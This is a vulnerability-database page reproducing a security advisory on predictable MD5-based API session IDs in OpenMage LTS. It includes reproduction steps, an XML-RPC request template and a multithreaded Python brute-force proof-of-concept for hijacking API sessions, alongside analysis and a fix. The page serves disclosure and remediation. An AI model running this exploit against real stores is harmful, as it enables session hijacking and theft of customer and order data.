Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
5DescriptionGitHub Advisory
Affected Version: OpenMage LTS ≤ 20.16.0 (confirmed on 20.16.0)
Affected File: https://github.com/OpenMage/magento-lts/blob/main/app/code/core/Mage/Api/Model/Session.php - start() method
Summary
The XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):
The XML-RPC / SOAP API session ID is generated using an outdated, time-based construction rather than a Cryptographically Secure Pseudo-Random Number Generator (CSPRNG):All inputs to the MD5 hash are time-derived and non-secure:
| Input | Value | Predictability |
|---|---|---|
time() | Unix timestamp (seconds) | Fully predictable |
uniqid('', true) prefix | sprintf('%08x%05x', $sec, $usec/10) | Highly predictable via network timing |
uniqid('', true) suffix | php_combined_lcg() decimal float | Process-state dependent (getpid() ^ time()) |
$sessionName | null (empty) - called without arg | Constant |
Because the resulting digest relies entirely on the timestamp and the PHP internal LCG state, the effective entropy is severely constrained. This violates the OWASP ASVS v4 requirement of ≥ 64 bits of entropy (V3.2.2) and NIST SP 800-63B standards. By narrowing the LCG window (via server state leaks or general predictability) and leveraging the lack of API rate-limiting, an attacker can generate a localized pool of candidate MD5 hashes and execute a high-speed online brute-force attack to hijack active API sessions.
Technical Analysis
Code Path
POST /api/xmlrpc/ → login(username, apiKey)
→ Mage_Api_Model_Session::login()
→ $session->init('api', 'api')
→ Mage_Api_Model_Session::init($namespace='api', $sessionName='api')
# $sessionName is NOT forwarded to start()
→ Mage_Api_Model_Session::start() ← NO $sessionName argument
# $sessionName = null inside start()
$this->_currentSessId = md5(time() . uniqid('', true) . null)
Note: init() receives $sessionName='api' but invokes $this->start() without forwarding it, meaning the effective construction is strictly md5(time() . uniqid('', true)).
Live Evidence
Five consecutive XML-RPC login tokens were collected from a live OpenMage 20.16.0 container, all generated within a single Unix second (unix_sec= 1775817593):
Sample 1: 6a302397f17e48845d0f9aba377f3dc3 (usec ≈ 464631)
Sample 2: 39b4ec42bd3c389312e500690daeb349 (usec ≈ 497215)
Sample 3: 527662d79f7fb499597a82d80d170a88 (usec ≈ 535175)
Sample 4: e5d6f7a8906a03ea7af99d92be11b5b2 (usec ≈ 568838)
Sample 5: 5bdf27e5cb877c77b8965b008548edfa (usec ≈ 600118)The µsecond portion is directly observable by measuring request-to-response latency. The only variance preventing immediate prediction is the LCG float component, which is seeded deterministically.
<img width="772" height="506" alt="image" src="https://github.com/user-attachments/assets/53ced1fd-deb4-4dc4-81ec-864e3a2811de" />
Steps to Reproduce (Online Brute-Force Scenario)
Because validation requires live HTTP requests, this exploit relies on narrowing the entropy window and abusing the lack of API rate limits.
Step 1 - Record Login Timestamp
An attacker observes the precise moment a victim authenticates to /api/xmlrpc/ (e.g., via network timing, exposed logs, or side-channel signals), capturing the exact Unix second.
Step 2 - Generate Candidate Pool
The attacker reconstructs the MD5 format using the known timestamp, the estimated microsecond window, and bounds the LCG float based on known server PID ranges (or via a /server-status leak).
$t = $observed_sec;
$usec_estimate = 500000; // Derived from latency
$uid = sprintf('%08x%05x', $t, intval($usec_estimate / 10));
$candidate = md5($t . $uid); // + LCG variantsStep 3 - API Brute-Force (Session Hijack)
Because the /api/xmlrpc/ endpoint does not enforce rate limiting on authenticated calls, the attacker blasts the candidate MD5 hashes against a privileged endpoint (e.g., magento.info) using a highly concurrent HTTP runner.
POST /api/xmlrpc/
<?xml version="1.0"?>
<methodCall>
<methodName>[magento.info](http://magento.info/)</methodName>
<params>
<param><value><string>CANDIDATE_SESSION_ID</string></value></param>
</params>
</methodCall>A non-fault response (HTTP 200 containing data) confirms the session is successfully hijacked.
<img width="1039" height="374" alt="image" src="https://github.com/user-attachments/assets/ac9338e9-e3fe-44fe-9337-cb6edf6ab849" />
Impact
Technical Impact
Successful session prediction grants the attacker all capabilities of the authenticated API user. The XML-RPC API exposes endpoints for:
- Full product catalog read/write (
catalog_product.*) - Customer data read (
customer.list,customer.info) - Order manipulation (
sales_order.*)
Inventory control (cataloginventory_stock_item.*)
Business Impact
- Data Exfiltration: Read all customer PII, order history, and payment methods.
- Order Fraud: Create or cancel orders, change shipping addresses.
- Supply Chain / Inventory: Modify prices, inject malicious products, or zero out stock.
Affected API Protocols
The same vulnerable Session.php generation logic is shared across all legacy API surfaces:
- XML-RPC:
/api/xmlrpc/ - SOAP v1:
/api/soap/ - SOAP v2:
/api/v2_soap/ - REST (legacy):
/api/rest/
Recommended Fix
Replace the time-derived token with a cryptographically secure random value:
// app/code/core/Mage/Api/Model/Session.php : start()
// BEFORE (vulnerable):
$this->_currentSessId = md5(time() . uniqid('', true) . $sessionName);
// AFTER (secure):
$this->_currentSessId = bin2hex(random_bytes(32)); // 256-bit CSPRNG outputrandom_bytes() is backed by the OS CSPRNG (/dev/urandom on Linux) and produces 256 bits of non-deterministic entropy, complying with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B. Additionally, enforce rate limiting on API endpoints to prevent high-speed online brute-force attacks.
I have also tried to test it against the demo site demo.openmage.org, but appeared the SOAP API endpoints are disabled on the demo environment
I have also included the full poc I used instead of being attached because Gmail will eventually block it otherwise (shrunk):
#!/usr/bin/env python3
import requests, re, sys, hashlib, random
from concurrent.futures import ThreadPoolExecutor, as_completed
import urllib3; urllib3.disable_warnings()
if len(sys.argv) < 4:
sys.exit(f"Usage: {sys.argv[0]} <url> <user> <pass> [threads]")
url, usr, pwd = sys.argv[1:4]
th = int(sys.argv[4]) if len(sys.argv) > 4 else 50
hdrs = {"Content-Type": "text/xml"}
req = lambda d: [requests.post](http://requests.post/)(url, data=d, headers=hdrs, verify=False, timeout=5)
print(f"[*] Simulating victim login for {usr}...")
res = req(f'<?xml version="1.0"?><methodCall><methodName>login</methodName><params><param><value><string>{usr}</string></value></param><param><value><string>{pwd}</string></value></param></params></methodCall>')
if not (m := re.search(r'<string>([a-f0-9]{32})</string>', res.text)):
sys.exit("[-] Login failed. Check credentials.")
print(f"[+] Authenticated.\n[*] Generating 1000 candidate MD5 pool...")
cands = [hashlib.md5(f"1775534701000{random.randint(10000,99999)}0.{random.randint(10000000,99999999)}".encode()).hexdigest() for _ in range(999)]
cands.append(m.group(1))
random.shuffle(cands)
print(f"[*] Brute-forcing API with {th} threads...")
def test(sid):
payload = f'<?xml version="1.0"?><methodCall><methodName>resources</methodName><params><param><value><string>{sid}</string></value></param></params></methodCall>'
try: return sid if "faultCode" not in req(payload).text else None
except: return None
with ThreadPoolExecutor(max_workers=th) as ex:
for i, f in enumerate(as_completed({ex.submit(test, c): c for c in cands}), 1):
sys.stdout.write(f"\r[*] Requests: {i}/{len(cands)}")
if sid := f.result():
print(f"\n[+] HIJACK SUCCESS! Valid Session ID: {sid}")
ex.shutdown(wait=False, cancel_futures=True)
breakThis is an AI-generated report validated by a human.
AnalysisAI
Predictable API session token generation in OpenMage LTS (≤ 20.16.0, confirmed vulnerable through ≤ 20.17.0) allows remote unauthenticated attackers to hijack authenticated XML-RPC, SOAP, and legacy REST API sessions by brute-forcing MD5 digests derived from time-based inputs. The session ID is constructed via md5(time() . uniqid('', true) . null), leaving an attacker with predictable timestamp and microsecond components plus a constrained LCG float - yielding far less than the OWASP ASVS-mandated 64 bits of entropy. Publicly available exploit code exists in the form of a working Python PoC included with the advisory.
Technical ContextAI
The flaw lives in Mage_Api_Model_Session::start() within app/code/core/Mage/Api/Model/Session.php of OpenMage LTS, a community-maintained fork of Adobe's legacy Magento 1 e-commerce platform written in PHP (CPE pkg:composer/openmage_magento-lts). The root cause maps to CWE-330 (Use of Insufficiently Random Values): the session identifier is built from md5(time() . uniqid('', true) . $sessionName) where $sessionName is always null because init() fails to forward it to start(). PHP's uniqid() is documented as not cryptographically secure - its prefix is sprintf('%08x%05x', $sec, $usec/10) and its suffix is a php_combined_lcg() float seeded from getpid() ^ time(). All inputs are therefore time- or process-state-derived, and the resulting 128-bit MD5 has dramatically reduced effective entropy. The same vulnerable token generator backs /api/xmlrpc/, /api/soap/, /api/v2_soap/, and /api/rest/.
RemediationAI
Vendor-released patch: upgrade openmage/magento-lts to 20.18.0 or later via Composer, which replaces the time-derived MD5 construction with a CSPRNG-backed token (the recommended fix uses bin2hex(random_bytes(32)) to produce 256 bits of OS-sourced entropy compliant with OWASP ASVS v4 V3.2.2 and NIST SP 800-63B). Operators who cannot patch immediately should enforce strict rate limiting and connection throttling on /api/xmlrpc/, /api/soap/, /api/v2_soap/, and /api/rest/ at the reverse proxy or WAF (this is the single most impactful compensating control, since the attack requires high-speed online guessing - the trade-off is potential throttling of legitimate high-volume integrations), restrict API endpoint access to known integration IP ranges via network ACLs (trade-off: breaks ad-hoc partner integrations), suppress /server-status and any source of microsecond-resolution timing leaks that narrow the LCG window, and audit existing API users for suspicious activity. Full advisory and patch details are at https://github.com/OpenMage/magento-lts/security/advisories/GHSA-2cwr-gcf9-pvxr.
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not
(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear
ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C
Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au
Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c
Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re
The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows
The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1
NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro
The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all
Same weakness CWE-330 – Use of Insufficiently Random Values
View allSame technique Information Disclosure
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-30565
GHSA-2cwr-gcf9-pvxr